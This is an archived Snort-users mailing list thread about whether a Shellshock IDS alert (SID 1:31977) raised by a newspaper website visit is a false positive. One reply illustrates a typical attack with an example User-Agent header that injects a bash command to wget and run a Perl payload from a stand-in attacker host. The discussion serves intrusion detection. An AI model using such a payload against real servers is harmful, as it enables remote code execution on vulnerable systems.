Snort mailing list archives
Re: ShellShock Signatures
From: "Joel Esler (jesler)" <jesler () cisco com>
Date: Tue, 3 Mar 2015 16:57:31 +0000
We made a blog post back when this came out on the details of the vulnerability here: http://vrt-blog.snort.org/2014/09/shellshock-update-bash-immediately.html -- Joel Esler Open Source Manager Threat Intelligence Team Lead Talos Group On Mar 3, 2015, at 11:37 AM, s0ups . <ynots0ups () gmail com<mailto:ynots0ups () gmail com>> wrote: On Mon, Mar 2, 2015 at 8:54 PM, Colin Edwards <colin.p.edwards () gmail com<mailto:colin.p.edwards () gmail com>> wrote: Hello Snort Users, I'm a new list member, and happy to say that I've been working with Firesight and a couple of ASA-X Firepower modules for almost a week now. This is my first time hands-on w/ an IPS/IDS. I'm here because I found this message from this list while researching an alert: http://sourceforge.net/p/snort/mailman/message/32980285/ . I had a user viewing a newspaper's website today, and I received an alert for 1:31977. I actually wasn't familiar with the domain name, and just searching for the domain I saw in the alert in Google also generated an alert from my workstation (I assume something to do with Google pulling news/images to display in the results?). The URI from the request does have "() {" in it, so that's why it was triggered, but I don't know if it's a False Positive alert. The website was for the Sacramento Bee (www.sacbee.com<http://www.sacbee.com/>). I can provide more detail from the pcap / URI when I'm back in the office tomorrow. While I'm introducing myself as a snort newbie...If anyone has any recommendations for other resources or reading material, feel free to message me off-list. Cheers, Colin Edwards CISSP, GCIH, GCWN, GSEC, MCSE Yo Colin, As you probably know, Shellshock attacks attempt to exploit environment variables that use user-provided data. The attacks are pretty easy to identify as they usually have some recognizable commands after the "() { :;};". I've actually hardly, if ever, see 1:31977 in my environment as the majority of the legit hits I see target HTTP header fields (so 1:31978 is more common) like so: GET /cgi-bin/possiblevulnerablescript.cgi User-Agent: () { :;}; /bin/bash -c "cd /var/tmp;wget http://attackerwebsite/maliciousperlcode;perl maliciousperlcode Fireeye has a good explanation and illustration of the various attack methods seen for the Shellshock vulnerability which will give you a good idea on what the common attacks look like. (https://www.fireeye.com/blog/threat-research/2014/09/shellshock-in-the-wild.html) Chances are if it's an HTTP response from an external webserver to a client browser than it's a FP and poses little to no threat. I'd be interested in checking out the URI if you want to send it to me. - s0ups On Mon, Mar 2, 2015 at 8:54 PM, Colin Edwards <colin.p.edwards () gmail com<mailto:colin.p.edwards () gmail com>> wrote: Hello Snort Users, I'm a new list member, and happy to say that I've been working with Firesight and a couple of ASA-X Firepower modules for almost a week now. This is my first time hands-on w/ an IPS/IDS. I'm here because I found this message from this list while researching an alert: http://sourceforge.net/p/snort/mailman/message/32980285/ . I had a user viewing a newspaper's website today, and I received an alert for 1:31977. I actually wasn't familiar with the domain name, and just searching for the domain I saw in the alert in Google also generated an alert from my workstation (I assume something to do with Google pulling news/images to display in the results?). The URI from the request does have "() {" in it, so that's why it was triggered, but I don't know if it's a False Positive alert. The website was for the Sacramento Bee (www.sacbee.com<http://www.sacbee.com/>). I can provide more detail from the pcap / URI when I'm back in the office tomorrow. While I'm introducing myself as a snort newbie...If anyone has any recommendations for other resources or reading material, feel free to message me off-list. Cheers, Colin Edwards CISSP, GCIH, GCWN, GSEC, MCSE ------------------------------------------------------------------------------ Dive into the World of Parallel Programming The Go Parallel Website, sponsored by Intel and developed in partnership with Slashdot Media, is your hub for all things parallel software development, from weekly thought leadership blogs to news, videos, case studies, tutorials and more. Take a look and join the conversation now. http://goparallel.sourceforge.net/ _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net<mailto:Snort-users () lists sourceforge net> Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users Please visit http://blog.snort.org<http://blog.snort.org/> to stay current on all the latest Snort news! ------------------------------------------------------------------------------ Dive into the World of Parallel Programming The Go Parallel Website, sponsored by Intel and developed in partnership with Slashdot Media, is your hub for all things parallel software development, from weekly thought leadership blogs to news, videos, case studies, tutorials and more. Take a look and join the conversation now. http://goparallel.sourceforge.net/_______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net<mailto:Snort-users () lists sourceforge net> Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users Please visit http://blog.snort.org to stay current on all the latest Snort news!
------------------------------------------------------------------------------ Dive into the World of Parallel Programming The Go Parallel Website, sponsored by Intel and developed in partnership with Slashdot Media, is your hub for all things parallel software development, from weekly thought leadership blogs to news, videos, case studies, tutorials and more. Take a look and join the conversation now. http://goparallel.sourceforge.net/
_______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users Please visit http://blog.snort.org to stay current on all the latest Snort news!
Current thread:
- ShellShock Signatures Colin Edwards (Mar 02)
- Re: ShellShock Signatures s0ups . (Mar 03)
- Re: ShellShock Signatures Joel Esler (jesler) (Mar 03)
- Re: ShellShock Signatures Colin Edwards (Mar 05)
- Re: ShellShock Signatures Joel Esler (jesler) (Mar 05)
- Re: ShellShock Signatures Joel Esler (jesler) (Mar 03)
- Re: ShellShock Signatures s0ups . (Mar 03)